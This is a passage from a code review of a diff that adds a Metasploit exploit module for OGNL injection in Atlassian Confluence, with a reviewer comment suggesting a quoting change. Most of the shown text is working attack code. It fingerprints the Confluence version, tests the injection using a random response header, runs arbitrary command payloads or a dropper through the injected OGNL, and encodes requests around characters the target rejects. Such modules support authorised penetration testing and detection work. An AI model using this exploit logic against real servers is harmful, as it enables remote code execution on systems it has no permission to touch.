modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb

```diff
@@ -0,0 +1,205 @@
+  def check
+    version = get_confluence_version
+    return CheckCode::Unknown unless version
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+
+    return CheckCode::Unknown unless res
+
+    unless res && res.headers.include?(header)
+      # version 7.15 is technically vulnerable to the OGNL injection but not exploitable
+      return CheckCode::Detected("Detected Confluence version: #{version}") if version >= Rex::Version.new('7.15')
+
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    vprint_status("Response header: #{res.headers[header]}")
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.action')
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
+  def exploit
+    version = get_confluence_version
+    fail_with(Failure::Unknown, 'Failed to fingerprint the target server.') unless version
+    fail_with(Failure::NoTarget, "Confluence version #{version} is not exploitable.") if version >= Rex::Version.new('7.15')
+
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl(cmd, header: header)
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def encode_ognl(ognl)
+    # Check and fail if the command contains the follow bad characters:
+    #   ';' seems to terminates the OGNL statement
+    #   '/' causes the target to return an HTTP/400 error
+    #   '\' causes the target to return an HTTP/400 error (sometimes?)
+    #   '\r' ends the GET request prematurely
+    #   '\n' ends the GET request prematurely
+
+    bad_chars = %w[; \\ \r \n] # and maybe '/'
+    bad_chars.each do |c|
+      if ognl.include? c
+        print_error("Bad OGNL request: #{ognl}")
+        fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
+      end
+    end
+
+    # The following list of characters *must* be encoded or ORNL will asplode
+    encodable_chars = {
+      "%": '%25', # Always do this one first.  :-)
+      " ": '%20',
+      "\"": '%22',
```

Comment:
This would align the keys nicely and remove the requirement for escaping:

```suggestion
      '"': '%22',
```